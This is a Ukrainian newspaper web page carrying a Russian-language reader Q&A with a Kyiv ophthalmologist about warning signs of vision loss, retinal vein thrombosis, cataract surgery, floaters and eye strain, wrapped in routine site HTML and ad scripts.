<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="ru" lang="ru">
<head>
 <script type="text/javascript">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</script>
 <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
 <title>Офтальмолог Наталья Розумей: &laquo;Появление пятна или пелены перед глазами может предупреждать о... - Газета &laquo;ФАКТЫ&raquo;</title><meta property="og:type" content="article" />
<meta property="twitter:card" content="summary_large_image" />
<meta property="twitter:creator" content="@faktyua" />
<meta property="og:title" content="Офтальмолог Наталья Розумей: «Появление пятна или пелены перед глазами может предупреждать о..." />
<meta property="twitter:title" content="Офтальмолог Наталья Розумей: «Появление пятна или пелены перед глазами может предупреждать о..." />
<meta property="fb:app_id" content="201040317082879" />
<meta property="og:description" content="Чтобы сохранить зрение, надо немедленно поспешить к врачу" />
<meta property="twitter:description" content="Чтобы сохранить зрение, надо немедленно поспешить к врачу" />
<meta property="og:url" content="http://fakty.ua/258532-oftalmolog-natalya-rozumej-poyavlenie-pyatna-ili-peleny-pered-glazami-mozhet-preduprezhdat-o-nadvigayucshejsya-slepote" />
<meta property="og:image:width" content="600" />
<meta property="og:image:height" content="449" />
<meta property="og:image" content="http://fakty.ua/photos/article/25/85/258532.jpg" />
<meta property="twitter:image" content="http://fakty.ua/photos/article/25/85/258532.jpg" />
<meta name="description" content="Чтобы сохранить зрение, надо немедленно поспешить к&amp;nbsp;врачу" />
<meta name="keywords" content="новость, Офтальмолог, Наталья, Розумей, Появление, пятна, или, пелены, перед, глазами, может, предупреждать, надвигающейся, слепоте" />
<link rel="stylesheet" type="text/css" href="/css/style.css?v=15" />
<link rel="stylesheet" type="text/css" href="/css/additional.css?v=52" />
<link rel="stylesheet" type="text/css" href="/css/mobile.css?v=37" />
<script type="text/javascript" src="/assets/a3704679/jquery.min.js"></script>
<script type="text/javascript" src="/js/jquery.cookie.js"></script>
<script type="text/javascript" src="/js/jquery.validate.js"></script>
<script type="text/javascript" src="/js/shortcut.js"></script>
<script type="text/javascript" src="/assets/b127a98f/assets/js/front_read.js"></script>
<script type="text/javascript" src="/js/comments.js"></script>
<script type="text/javascript" src="/assets/ddf6fe98/assets/js/login.js"></script>
<script type="text/javascript" src="/assets/ddf6fe98/assets/js/date_refresh.js"></script>
<script type="text/javascript" src="/assets/8a70ac48/assets/js/horoscope_block.js"></script>
<script type="text/javascript" src="/assets/68a6eeb0/assets/js/promo_widget.js"></script>
<script type="text/javascript" src="/js/fact.js?v=26"></script>
<script type="text/javascript" src="/js/analytics.js?v=15"></script>
<script type="text/javascript" src="/js/admixer.js?v=11"></script>
 <meta content="width=device-width, initial-scale=1, maximum-scale=2" name="viewport">
 <link rel="apple-touch-icon" sizes="180x180" href="/apple-touch-icon.png?v=2">
 <link rel="icon" type="image/png" sizes="32x32" href="/favicon-32x32.png?v=2">
 <link rel="icon" type="image/png" sizes="16x16" href="/favicon-16x16.png?v=2">
 <link rel="manifest" href="/manifest.json?v=2">
 <link rel="mask-icon" href="/safari-pinned-tab.svg?v=2" color="#5bbad5">
 <link rel="shortcut icon" href="/favicon.ico?v=2">
 <meta name="theme-color" content="#ffffff">
 <script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
 <script type="text/javascript">var GB_ROOT_DIR = "http://fakty.ua/js/greybox/";</script>
 <link rel="alternate" type="application/rss+xml" title="Украина" href="/rss_feed/ukraina" />
 <link rel="alternate" type="application/rss+xml" title="Мир" href="/rss_feed/world" />
 <link rel="alternate" type="application/rss+xml" title="Политика" href="/rss_feed/politics" />
 <link rel="alternate" type="application/rss+xml" title="Происшествия" href="/rss_feed/crime" />
 <link rel="alternate" type="application/rss+xml" title="Здоровье" href="/rss_feed/health" />
 <link rel="alternate" type="application/rss+xml" title="Спорт" href="/rss_feed/sport" />
 <link rel="alternate" type="application/rss+xml" title="Культура" href="/rss_feed/culture" />
 <link rel="alternate" type="application/rss+xml" title="История современности" href="/rss_feed/stories" />
 <link rel="alternate" type="application/rss+xml" title="Житейские истории" href="/rss_feed/life-stories" />
 <link rel="alternate" type="application/rss+xml" title="Наука и технологии" href="/rss_feed/science" />
 <link rel="alternate" type="application/rss+xml" title="Все новости" href="/rss_feed/all" />
 <link rel="alternate" type="application/rss+xml" title="Деньги" href="/rss_feed/money" />
</head>
<body>
 <div class="fon_kartinka">
 <div class="page">
 <div class="page_cnt">
 <div class="page_content">
 <div class="page_content_main">
<div class="top_advertising" align="center">
 ﻿<div style="width:729px; height:90px"><div id='admixer_fc526f03eec94ee3a827cced5fa84b7d_zone_3069_sect_598_site_585'></div></div>
</div>
<!--googleoff: all-->
<div class="first_top">
<div class="fl_l header_date"><p id="date_container"><span></span></p></div>
<div class="clear"></div>
</div>
<!--googleon: all-->
<div class="top_pink">
 <div class="fl_l logo">
 <p><a href="/"><img src="/images/logo.png" width="229" height="74" alt="Факты" /></a></p>
 <p>и комментарии</p>
 </div>
 <div class="fl_l pink_menu">
 <div class="menu_on_pink">
<ul>
 <li class="begin"><a href="/" class="home">&nbsp;</a></li>
 <li><a href="/photo">ФотоФакты</a></li>
 <li><a href="/video">ВидеоФакты</a></li>
 <li><a href="/horoscope">Гороскоп</a></li>
 <li class="end"><a href="/archive">Архив</a></li>
 </ul>
<div class="clear"></div>
</div>
<div id="mobile_menu_button" class="mobile_menu hidden">
 <a href="#"></a>
</div> <div class="clear"></div>
<div class="weather">
 <div class="fl_l end" id="currency">
 <span>USD 26.70</span>
 <span class="hidden">EUR 32.93</span>
 <span class="hidden">GBP 37.03</span>
 <span class="hidden">JPY 0.25</span>
 </div>
 <div class="fl_r icons">
<ul>
 <li><a class="icon_fb" target="_blank" rel="nofollow" href="http://facebook.com/fakty.ua"></a></li>
 <li><a class="icon_tw" target="_blank" rel="nofollow" href="http://twitter.com/faktyua"></a></li>
 <li><a class="icon_gp" target="_blank" rel="nofollow" href="http://plus.google.com/+факты"></a></li>
</ul>
</div>
 <div class="clear"></div>
</div>
 </div>
<!--noindex-->
<!--googleoff: all-->
 <div class="fl_r find">
<div class="header_rss"><a href="http://fakty.ua/rss" rel="nofollow">RSS</a></div>
 <div>
<div class="fl_l">
 <ul id="loginForm">
 <li class="begin"><a id="login_link" href="/login" class="my_shadow register_link" rel="nofollow">вход</a></li>
 <li class="end"><a class="register_link" href="/register" rel="nofollow">регистрация</a></li>
 </ul>
 <ul id="profileForm">
 <li class="begin"><a class="yellow_login" href="/profile" rel="nofollow"><span id="loginText"></span> (профайл)</a></li>
 <li class="end"><a class="register_link" href="?logout=1" class="my_shadow" rel="nofollow">выход</a></li>
 </ul>
 <div class="clear"></div>
</div>
<div class="clear"></div>
</div>
<div class="forma_find">
 <form id="frm_name" action="/search/" method="get">
 <div class="div_find fl_l">
 <input id="i_find" type="text" value="" name="query" /> </div>
 <div class="div_find_btn fl_l"><input type="submit" class="btn_style" value="ПОИСК"/></div>
 <div class="clear"></div>
 </form>
</div> </div>
<!--googleon: all-->
<!--/noindex-->
 <div class="clear"></div>
</div>
<div id="main_menu" class="main_menu">
 <ul>
 <li ><a href="/">Главная</a></li>
 <li class="hidden"><a href="/news">Новости</a></li>
 <li ><a href="/categories/ukraina">Украина</a></li>
 <li ><a href="/categories/world">Мир</a></li>
 <li ><a href="/categories/politics">Политика</a></li>
 <li ><a href="/categories/money">Деньги</a></li>
 <li ><a href="/categories/crime">Происшествия</a></li>
 <li class="active"><a href="/categories/health">Здоровье</a></li>
 <li ><a href="/categories/culture">Культура</a></li>
 <li class="hidden"><a href="/categories/science">Наука</a></li>
 <li ><a href="/categories/sport">Спорт</a></li>
 <li ><a href="/categories/life-stories">Житейские истории</a></li>
 <li ><a href="/categories/stories">История современности</a></li>
 <li class="hidden"><a href="/photo">Фото</a></li>
 <li class="hidden"><a href="/video">Видео</a></li>
 <li class="hidden"><a href="/policlinika">Поликлиника "ФАКТОВ"</a></li>
 <li class="hidden"><a href="/search">Поиск</a></li>
 <li ><a href="/categories/blogs">Блоги</a></li>
 </ul>
 <div class="clear"></div>
</div>
<div class="submenu">
<ul>
<li class="active"><a href="/categories/health/pryamaya-liniya">Прямая линия</a></li>
<li class=""><a href="/categories/health/poleznye-sovety">Полезные советы</a></li>
<li class="end"><a href="/categories/health/pohudenie">Школа похудения</a></li>
</ul>
<div class="clear"></div>
</div>
<div class="page_content_left">
 <div class="fl_l left_main style_page">
 <div>
 <img class="fotoramka_l" width="200" height="149" src="/photos/article/25/85/258532w200zc0.jpg?v=175526" alt="Наталья Розумей"/>
<div class="gray_plashka2">
 </div>
<div class="tit_main_news"><h1>Офтальмолог Наталья Розумей: «Появление пятна или пелены перед глазами может предупреждать о надвигающейся слепоте»</h1></div>
<div class="tech_info">
 <div class="fl_l">
 <p><span>14.02.2018&nbsp;14:50</span>
 <span class="eye">66</span></p>
 </div>
 <div class="fl_r"><p><span>Размер текста:<span id="font_size_changer"> <a href="" class="a12">Абв</a>&nbsp;&nbsp;<span class="abv_14">Абв</span>&nbsp;&nbsp;<a href="" class="a18">Абв</a>&nbsp;&nbsp;</span></span></p></div>
 <div class="clear"></div>
</div>
<div id="article_content">
 <p class="first_abz">Чтобы сохранить зрение, надо немедленно поспешить к&nbsp;врачу</p>
 <p>
 </p>
<blockquote>
 <p>
 </p>
 <p>
 Все люди боятся слепоты: она означает беспомощность. Человек, который еще вчера видел мир и&nbsp;людей, сегодня вынужден двигаться наощупь и&nbsp;жить в&nbsp;темноте. С&nbsp;какими симптомами нужно немедленно обратиться к&nbsp;врачу? Как лечат тромбоз центральной вены сетчатки? Что делать, если кроме катаракты есть другое глазное заболевание? На&nbsp;эти и&nbsp;другие вопросы наших читателей во&nbsp;время прямой линии &laquo;ФАКТОВ&raquo; ответила <strong>заслуженный врач Украины, заведующая офтальмологическим отделением Александровской клинической больницы г.&nbsp;Киева кандидат медицинских наук Наталья Розумей.</strong></p>
</blockquote>
<h4 style="text-align: center;">
 &laquo;Венозный сосуд может закупориться из-за гипертонического криза или нарушения ритма сердца&raquo;</h4>
<p>
 <strong>*&mdash; Здравствуйте, Наталья Михайловна! Вас беспокоит Елена Владимировна из&nbsp;Киева, 77 лет. У&nbsp;меня сильная близорукость&nbsp;&mdash; минус семь, но&nbsp;очки я&nbsp;ношу на&nbsp;три диоптрии слабее. Беспокоит, что при чтении сливаются буквы, изображение предметов двоится. Что делать?</strong></p>
<p>
 <em>&mdash;&nbsp;Обратиться к&nbsp;офтальмологу, чтобы проверить зрение и&nbsp;состояние хрусталика. Он&nbsp;иногда мутнеет неравномерно, и&nbsp;появляются такие симптомы, как у&nbsp;вас. Также двоение может возникать из-за проблем с&nbsp;сетчаткой или при нарушении функций центральной нервной системы, когда ухудшается кровообращение коры головного мозга.</em></p>
<p>
 <strong>*&mdash; Звонит Мария Акимовна из&nbsp;Борисполя Киевской области. В&nbsp;прошлом году у&nbsp;меня случился тромбоз центральной вены сетчатки. Лечилась, но&nbsp;зрение так и&nbsp;не&nbsp;восстановилось. Неужели ничем нельзя помочь?</strong></p>
<p>
 <em>&mdash;&nbsp;Эффективность лечения во&nbsp;многом зависит от&nbsp;того, как быстро пациент обратится к&nbsp;врачу. Часто бывает так: человек стал хуже видеть одним глазом, появилась пелена или пятно, из-за которого хочется протереть глаз. Но&nbsp;когда смотрит двумя глазами, то&nbsp;никакого дискомфорта не&nbsp;ощущает. Поэтому решает, что к&nbsp;врачу пока не&nbsp;пойдет: мол, зрение само восстановится. И&nbsp;только когда оно ухудшается заметно, обращается к&nbsp;офтальмологу.</em></p>
<p>
 <em>Если диагноз поставлен вовремя, то&nbsp;помочь можно. Сегодня есть эффективные препараты, которые при тромбозе вводятся внутрь глаза (интравитреальные инъекции). Они предотвращают рост новых сосудов на&nbsp;сетчатке и&nbsp;эффективно действуют при ее&nbsp;отеке.</em></p>
<p>
 <strong>&mdash;&nbsp;Почему опасно, когда на&nbsp;сетчатке появляются новые сосуды?</strong></p>
<p>
 <em>&mdash;&nbsp;Кровоизлияние может повториться, а&nbsp;значит, произойдет отслойка сетчатки. Ведь новые сосуды вместе с&nbsp;кровью превращаются в&nbsp;фиброзную ткань, которая тянет на&nbsp;себя сетчатку. Но&nbsp;еще более опасно возникновение вторичной глаукомы. Поэтому после курса инъекций назначаем пациенту капли для профилактики глаукомы и&nbsp;противовоспалительные. Также при тромбозе центральной вены сетчатки показано лазерное лечение.</em></p>
<p>
 <strong>*&mdash; Ирина из&nbsp;Киева. У&nbsp;моего отца (он&nbsp;живет под Киевом) обнаружили тромбоз вены левого глаза. Что это за&nbsp;заболевание? Какие обследования нужно пройти?</strong></p>
<p>
 <em>&mdash;&nbsp;Тромбоз возникает из-за того, что в&nbsp;центральной вене или ее&nbsp;веточке образуется кровяной сгусток&nbsp;&mdash; тромб. Он&nbsp;закупоривает сосуд и&nbsp;перекрывает отток крови. Из-за нарушения кровоснабжения в&nbsp;венах (а&nbsp;закупорка может случиться в&nbsp;любом участке) плазма выходит в&nbsp;сетчатку.</em></p>
<p>
 <em>Причины тромбоза разные: гипертонический криз, нарушение ритма сердца, повышенная свертываемость крови (коагулопатия) и&nbsp;другие. Чтобы выяснить, почему возник тромбоз, пациенту необходимо обследовать сердце и&nbsp;сосуды. Кроме анализов крови, нужно сделать коагулограмму, электрокардиограмму, при необходимости&nbsp;&mdash; эхокардиографию (УЗИ сердца), провериться на&nbsp;сахарный диабет. Конечно, обязательна консультация кардиолога.</em></p>
<p>
 <em>Также мы&nbsp;проводим современную диагностику глаза: исследуем сетчатку с&nbsp;помощью оптического когерентного томографа, проверяем сосуды глазного дна с&nbsp;введением контраста (флюоресцентная ангиография), чтобы увидеть участки протекания крови в&nbsp;сетчатку. Применяем новейшее исследование, которое называется ангио-ОКТ (оптическая когерентная томография сосудов сетчатки). При желании ваш отец может обратиться в&nbsp;Александровскую больницу. Я&nbsp;принимаю по&nbsp;пятницам в&nbsp;кабинете &#8470;&thinsp;212 поликлиники (это четвертый корпус). Телефон кабинета: (044) 255&minus;16&minus;17.</em></p>
<blockquote>
 <p style="text-align: center;">
 ПРИЧИНЫ ТРОМБОЗА ВЕН СЕТЧАТКИ</p>
 <ul>
 <li>
 Гипертонический криз.</li>
 <li>
 Нарушение ритма сердца.</li>
 <li>
 Повышенная свертываемость крови.</li>
 <li>
 Сахарный диабет.</li>
 <li>
 Инфекции.</li>
 </ul>
</blockquote>
<h4 style="text-align: center;">
 &laquo;Заменив хрусталик, не&nbsp;спешите сразу выписывать очки&raquo;</h4>
<p>
 <strong>*&mdash; К&nbsp;вам обращается Ольга из&nbsp;Хмельницкого. Очень боюсь сосудистых заболеваний глаз: прочитала, что это угрожает слепотой. Как заподозрить нарушение?</strong></p>
<p>
 <em>&mdash;&nbsp;Бывает, что человек на&nbsp;приеме рассказывает: &laquo;Вижу только половину &laquo;картинки&raquo;. Жалуется, что зрение резко пропадает, либо появляется пятно в&nbsp;глазу. Это симптомы грозного сосудистого заболевания&nbsp;&mdash; эмболии артериального русла глаза. Из-за того что перекрыт приток крови к&nbsp;сетчатке, ткани не&nbsp;получают питания, и&nbsp;развивается их&nbsp;омертвение (некроз). Если в&nbsp;ближайшие три&nbsp;&mdash; шесть часов артериальное русло не&nbsp;заработает, то&nbsp;человек может полностью ослепнуть. В&nbsp;случае, когда немедленно обращается к&nbsp;врачу, зрение можно спасти, расширив сосуды,&nbsp;&mdash; это восстановит кровоток.</em></p>
<p>
 <em>У&nbsp;тех, кто получает помощь с&nbsp;опозданием, лишенная кровоснабжения сетчатка становится белой, как лист бумаги. Если начинаем активное лечение, расширяющее сосудистое русло, то&nbsp;кровоток активируется и&nbsp;образуются новые пути кровоснабжения за&nbsp;счет коллатералей, но&nbsp;прежнее артериальное русло восстановить очень трудно.</em></p>
<p>
 <strong>*&mdash; Алло! Могу я&nbsp;поговорить с&nbsp;доктором? Меня зовут Валентина, 77 лет. Живу в&nbsp;Киеве. С&nbsp;возрастом обнаружили диабет, а&nbsp;недавно сказали, что у&nbsp;меня есть незрелая катаракта и&nbsp;диабетическая ретинопатия. Можно мне оперировать катаракту?</strong></p>
<p>
 <em>&mdash;&nbsp;Думаю, да. Вам нужно провести комбинированное вмешательство: заменить помутневший хрусталик, одновременно прооперировав сетчатку и&nbsp;стекловидное тело. Возможно, понадобится еще и&nbsp;лазерная коагуляция, чтобы предупредить отслойку сетчатки.</em></p>
<p>
 <strong>*&mdash; Это Людмила Федоровна из&nbsp;Днепропетровской области. Недавно мне заменили оба хрусталика. И&nbsp;теперь один глаз хорошо видит вдаль, а&nbsp;другой&nbsp;&mdash; вблизи. Вот этот второй глаз болит. Доктор говорит, что так бывает. Что делать?</strong></p>
<p>
 <em>&mdash;&nbsp;Сегодня часто ставят хрусталики, позволяющие хорошо видеть вдаль одним глазом и&nbsp;вблизи вторым. Если разница в&nbsp;диоптриях между глазами не&nbsp;больше двух, то&nbsp;дискомфорта быть не&nbsp;должно. Думаю, потребуется полгода-год, чтобы вы&nbsp;привыкли к&nbsp;новым хрусталикам.</em></p>
<p>
 <strong>&mdash;&nbsp;Можно мне выписать очки?</strong></p>
<p>
 <em>&mdash;&nbsp;Я&nbsp;скажу вам то, что всегда повторяю своим пациентам: &laquo;Не&nbsp;спешите сразу выписывать очки&raquo;. Пусть пройдет хотя&nbsp;бы месяца три, чтобы глаз приспособился к&nbsp;хрусталику.</em></p>
<p>
 <strong>&mdash;&nbsp;Слышала, что есть универсальные хрусталики&hellip;</strong></p>
<p>
 <em>&mdash;&nbsp;Да, они называются мультифокальные. Но&nbsp;их&nbsp;нельзя ставить всем желающим. Такие хрусталики не&nbsp;показаны при сахарном диабете, ревматоидных заболеваниях, а&nbsp;также глазной патологии, связанной с&nbsp;макулярной областью сетчатки, зрительным нервом, роговицей. Если у&nbsp;человека нет таких проблем со&nbsp;здоровьем и&nbsp;у&nbsp;него обнаружили катаракту, то&nbsp;&mdash; пожалуйста.</em></p>
<p>
 <strong>*&mdash; Добрый день! Это Николай Трофимович из&nbsp;Николаева. Я&nbsp;принимаю препарат для лечения аденомы простаты. В&nbsp;инструкции прочитал, что возможны побочные эффекты со&nbsp;стороны зрения&nbsp;&mdash; его снижение, затуманивание. У&nbsp;меня с&nbsp;глазами действительно творится что-то неладное: они закисают, на&nbsp;слизистой появляются красноватые пятнышки. Что посоветуете?</strong></p>
<p>
 <em>&mdash;&nbsp;Думаю, это не&nbsp;связано с&nbsp;приемом лекарства. А&nbsp;бороться с&nbsp;хроническим конъюнктивитом помогут капли с&nbsp;антибиотиками. Обычно мы&nbsp;назначаем их&nbsp;на&nbsp;две недели, но&nbsp;лечиться нужно под наблюдением врача.</em></p>
<p>
 <strong>*&mdash; &laquo;ФАКТЫ&raquo;? Алексей из&nbsp;Черниговской области. У&nbsp;меня начали сильно краснеть и&nbsp;закисать глаза. Как лечиться?</strong></p>
<p>
 <em>&mdash;&nbsp;С&nbsp;чем связана ваша работа?</em></p>
<p>
 <strong>&mdash;&nbsp;Я&nbsp;работаю на&nbsp;продуктовом складе.</strong></p>
<p>
 <em>&mdash;&nbsp;Заочно трудно определить, что случилось. Скорее всего, вы&nbsp;занесли в&nbsp;глаза инфекцию грязными руками. Возможна аллергическая реакция на&nbsp;продукты. Нельзя исключить также сухость глаза, ведь на&nbsp;складе не&nbsp;самые благоприятные условия для его слизистой: холодно, сухо, сквозит. Советую вам все-таки показаться врачу, а&nbsp;пока можно закапывать в&nbsp;течение двух недель дезинфицирующие глазные капли. Затем еще неделю&nbsp;&mdash; капли, снимающие аллергию, увлажняющие слизистую.</em></p>
<p>
 <strong>&mdash;&nbsp;Можно промывать глаза отваром из&nbsp;ромашки?</strong></p>
<p>
 <em>&mdash;&nbsp;Да, только пользуйтесь стерильными салфетками.</em></p>
<p>
 <strong>*&mdash; Меня зовут Людмила. Живу в&nbsp;Полтаве. Хочу спросить, почему появляются &laquo;мушки&raquo; перед глазами? Я&nbsp;заметила их&nbsp;года два назад.</strong></p>
<p>
 <em>&mdash;&nbsp;Чаще всего из-за помутнения и&nbsp;уплотнения центральной зоны хрусталика. Это состояние обычно возникает с&nbsp;возрастом. Сами по&nbsp;себе темные плавающие точки никуда не&nbsp;исчезнут, более того&nbsp;&mdash; могут увеличиваться.</em></p>
<p>
 <em>Еще одна причина &laquo;мушек&raquo; в&nbsp;том, что в&nbsp;стекловидном теле может плавать так называемая глыбка. Ее&nbsp;нельзя увидеть глазом, а&nbsp;только при специальном освещении, расширив зрачок.</em></p>
<p>
 <em>Часто &laquo;мушки&raquo;, а&nbsp;также &laquo;молнии&raquo;, вспышки, &laquo;пружинки&raquo; появляются при остеохондрозе или другой патологии позвоночника. Из-за заболеваний позвоночного столба ухудшается кровоснабжение сетчатки и&nbsp;зрительного нерва. Нередко черными плавающими точками проявляются проблемы с&nbsp;сосудами головного мозга. Нужно обратиться к&nbsp;врачу. А&nbsp;пока советую закапывать глаза витаминными каплями.</em></p>
<blockquote>
 <p style="text-align: center;">
 ПОЧЕМУ ПОЯВЛЯЮТСЯ &laquo;МУШКИ&raquo;</p>
 <ul>
 <li>
 Помутнение и&nbsp;уплотнение центральной зоны хрусталика.</li>
 <li>
 Нарушения в&nbsp;стекловидном теле.</li>
 <li>
 Остеохондроз или другая патология позвоночника.</li>
 <li>
 Затрудненный кровоток в&nbsp;сосудах головного мозга.</li>
 </ul>
</blockquote>
<h4 style="text-align: center;">
 &laquo;Для зрения хорошо играть в&nbsp;бадминтон или настольный теннис&raquo;</h4>
<p>
 <strong>*&mdash; Наталия, киевлянка. Мне 58 лет, а&nbsp;первые очки надела еще в&nbsp;42 года. Тогда я&nbsp;не&nbsp;жаловалась на&nbsp;зрение, но&nbsp;на&nbsp;работе всем, кто работал за&nbsp;компьютером, заказали специальные очки с&nbsp;напылением. Мне кажется, что с&nbsp;тех пор у&nbsp;меня и&nbsp;начала развиваться дальнозоркость. Сегодня зрение чуть больше плюс трех диоптрий, но&nbsp;очки для меня слабые. Какое обследование нужно пройти?</strong></p>
<p>
 <em>&mdash;&nbsp;Возможно, в&nbsp;42 года вы&nbsp;просто не&nbsp;заметили скрытую дальнозоркость, которая обычно начинается после 35 лет. Вам нужно обратиться к&nbsp;врачу, чтобы проверить остроту зрения и&nbsp;обследоваться. При скрытой дальнозоркости, чтобы предупредить головную боль, усталость глаз, покраснение век, мы&nbsp;назначаем полную коррекцию зрения. Особенно важно правильно подобрать очки для близи. Если этого не&nbsp;сделать, могут воспаляться края век (хронический блефарит). Также важно регулярно проверять внутриглазное давление.</em></p>
<p>
 <strong>&mdash;&nbsp;Как часто?</strong></p>
<p>
 <em>&mdash;&nbsp;В&nbsp;вашем возрасте желательно раз в&nbsp;год. Врач еще проверит остроту зрения, осмотрит глазное дно.</em></p>
<p>
 <strong>*&mdash; Вас беспокоит Анна из&nbsp;Чернигова. Сейчас на&nbsp;каждом шагу рекламируются средства и&nbsp;приспособления, якобы улучшающие зрение. Хотелось&nbsp;бы знать, стоит&nbsp;ли тратиться, например, на&nbsp;массажер для глаз?</strong></p>
<p>
 <em>&mdash;&nbsp;Это противоречивый вопрос. Нужно четко знать, что у&nbsp;вас нет никаких противопоказаний для массажа глазного яблока. Например, массажеры для век показаны пациентам, страдающим хроническим блефаритом. А&nbsp;молодым людям, у&nbsp;которых есть близорукость, гораздо больше пользы принесет общий массаж, особенно с&nbsp;проработкой воротниковой зоны.</em></p>
<p>
 <strong>&mdash;&nbsp;Я&nbsp;сама и&nbsp;дочка-студентка много времени проводим за&nbsp;компьютером. Как снять усталость глаз?</strong></p>
<p>
 <em>&mdash;&nbsp;Для глаз, как и&nbsp;всего организма, полезно движение. Поработали час&nbsp;&mdash; встаньте, чтобы походить, размяться. Полезны плавание и&nbsp;другие виды спорта, которые укрепляют позвоночник и&nbsp;улучшают кровообращение в&nbsp;спине и&nbsp;шее,&nbsp;&mdash; например, специальная гимнастика или йога. Очень хорошо влияют на&nbsp;глаза активные игры, в&nbsp;которых нужно следить за&nbsp;воланом или мячом: настольный теннис, бадминтон, волейбол.</em></p>
<p>
 <em>Если глаза устают, слизистая пересыхает, можно закапывать их&nbsp;увлажняющими каплями пять-шесть раз в&nbsp;день. Следует хорошо осветить рабочий стол. При недостаточном дневном освещении поставьте настольную лампу. Полезно время от&nbsp;времени принимать витамины А и Е, если нет противопоказаний. Эти витамины красоты, как их&nbsp;называют, способствуют увлажнению кожи и&nbsp;слизистой глаз.</em></p>
<blockquote>
 <p style="text-align: center;">
 ЧТОБЫ ГЛАЗА МЕНЬШЕ УСТАВАЛИ</p>
 <ul>
 <li>
 При сидячей работе каждый час вставайте минут на&nbsp;пять, чтобы размяться.</li>
 <li>
 Работая за&nbsp;компьютером, отвлекитесь на&nbsp;пару минут, чтобы поводить глазами вправо-влево, вверх-вниз, &laquo;нарисовать&raquo; круг, квадрат, ромб и&nbsp;прямоугольник.</li>
 <li>
 Полезно переводить взгляд с&nbsp;близкого предмета на&nbsp;отдаленный дом или дерево за&nbsp;окном.</li>
 <li>
 Несколько раз в&nbsp;день закапывайте глаза специальными увлажняющими каплями.</li>
 </ul>
</blockquote>
<p>
 <strong>Прямую линию провела Наталия САНДРОВИЧ, &laquo;ФАКТЫ&raquo; </strong></p> 
 </div>
<script type="application/javascript">
 var da = {"articleswidget_articleId":"258532","articleswidget_articleName":"oftalmolog-natalya-rozumej-poyavlenie-pyatna-ili-peleny-pered-glazami-mozhet-preduprezhdat-o-nadvigayucshejsya-slepote","notAjax":1,"s":"7182fa0b6b2b2bc57f4d105b8906945b"};
 $jx.ajax({
 url: '/count',
 data: da
 });
</script>
<div class="manage_panel">
 <div class="fl_l">
 <a href="/categories/health/pryamaya-liniya" class="previous">К списку статей</a> </div>
 <div class="fl_r">
 <div class="linki">
 <ul class="ico_manage">
 <li><a href="/print/258532" class="ico_print" rel="nofollow">Печатная версия</a></li>
 <li><a href="mailto:y.mokrenko@fakty.ua?subject=Статья на сайте 258532&body=http://fakty.ua/258532" class="ico_mail"><span>Письмо редактору</span></a></li>
 <li><a href="" class="ico_frend" id="afrend"><span>Отправить другу<span></a></li>
 <li class="end"><a id="abuse" class="ico_abuse" href=""><span>Пожаловаться</span></a></li>
 </ul>
 </div>
 <div id="manage">
 <div class="manage">
 <form id="sendToFriend">
 <ul>
 <li><input id="name" name="SendFriend[senderName]" type="text" title="Ваше имя" value="Ваше имя" /></li>
 <input id="article_id" name="SendFriend[article_id]" type="hidden" value="258532" />
 <input name="widgetName" type="hidden" value="Articles" />
 <li><input id="email" name="SendFriend[senderEmail]" type="text" title="Ваш e-mail" value="Ваш e-mail" /></li>
 <li><input id="frend" name="SendFriend[friendEmail]" type="text" title="E-mail друга" value="E-mail друга" /></li>
 <li class="end"><input type="submit" value="&nbsp;" class="btn_mails" /></li>
 </ul>
 </form>
 </div>
 </div>
 </div>
 <div class="clear"></div>
 <div class="linki report_error">
 <p>Заметили ошибку? Выделите её и нажмите CTRL+Enter</p>
 </div>
 <ul class="many_ico"><li><div class="facebook"><a href="https://www.facebook.com/dialog/share?app_id=201040317082879&href=http://fakty.ua/258532" onclick="javascript:window.open(this.href,'','menubar=no,toolbar=no,resizable=yes,scrollbars=yes,height=600,width=600');return false;"><img src="/images/social_logos/facebook.svg"><span>Поделиться</span></a></div><div id="fb_share_count"></div></li><li><div class="twitter"><a href="https://twitter.com/intent/tweet?text=Офтальмолог Наталья Розумей: &laquo;Появление пятна или пелены перед глазами может предупреждать о...&amp;url=http://fakty.ua/258532" onclick="javascript:window.open(this.href,'','menubar=no,toolbar=no,resizable=yes,scrollbars=yes,height=600,width=600');return false;"><img src="/images/social_logos/twitter.svg"><span>Твитнуть</span></a></div></li><li class="googlepls"><div class="googleplus"><a href="https://plus.google.com/share?url=http://fakty.ua/258532" onclick="javascript:window.open(this.href,'','menubar=no,toolbar=no,resizable=yes,scrollbars=yes,height=600,width=600');return false;"><img src="/images/social_logos/googleplus.svg"><span>Поделиться</span></a></div></li></ul>
</div>
 <script>
var pS = document.getElementById('article_content').children;
var adsmob=document.createElement('div');
adsmob.className = "hidden mobilev";
adsmob.style.paddingBottom = "15px";
adsmob.innerHTML = '<ins class="adsbygoogle" style="display:block" data-ad-client="ca-pub-9406759266935085" data-ad-slot="8528501258" data-ad-format="auto"></ins>';
document.getElementById('article_content').insertBefore(adsmob, pS[Math.floor(pS.length/2-1)].nextSibling);
(adsbygoogle = window.adsbygoogle || []).push({});
</script> 
<a id="comments_start" name="comments_start"></a>
<div id="comments_content_block"></div>
<script type="application/javascript">
 var getCommentsByUrl = function(link, noData) {
 if (!link) {
 link = '/objectcomments';
 }
 var data = {"articleswidget_articleId":"258532","articleswidget_articleName":"oftalmolog-natalya-rozumej-poyavlenie-pyatna-ili-peleny-pered-glazami-mozhet-preduprezhdat-o-nadvigayucshejsya-slepote","notAjax":1,"s":"7182fa0b6b2b2bc57f4d105b8906945b"};
 data.dontCountRead = 1;
 $jx.ajax({
 url: link,
 success: function(result) {
 var block = $jx('#comments_content_block');
 result = result.replace(/<script[^>]+jquery\.min\.js[^<]+<\/script>/, ''); // remove jquery inclusion
 block.html(result);
 block.find('.pager a').click(function(){
 getCommentsByUrl($jx(this).attr('href'), true);
 window.location.hash = 'comments_start';
 return false;
 });
 },
 data: data
 });
 }
 getCommentsByUrl();
</script>
 <!--www.fakty.ua, Content banner (640 333)-->
<div id='admixer_3c67d408853547d2ba451d04ee0a7ec9_zone_771_sect_598_site_585'></div>
 <div class="">
 <div class="tit_line"><span class="tit">Читайте также </span></div>
<div id="phoenix593006254f32fe3e6846a30c"></div> <script type="text/javascript">
 var site_id = "593005464f32fe3e764d0ea4";
 var widget_id = "593006254f32fe3e6846a30c";
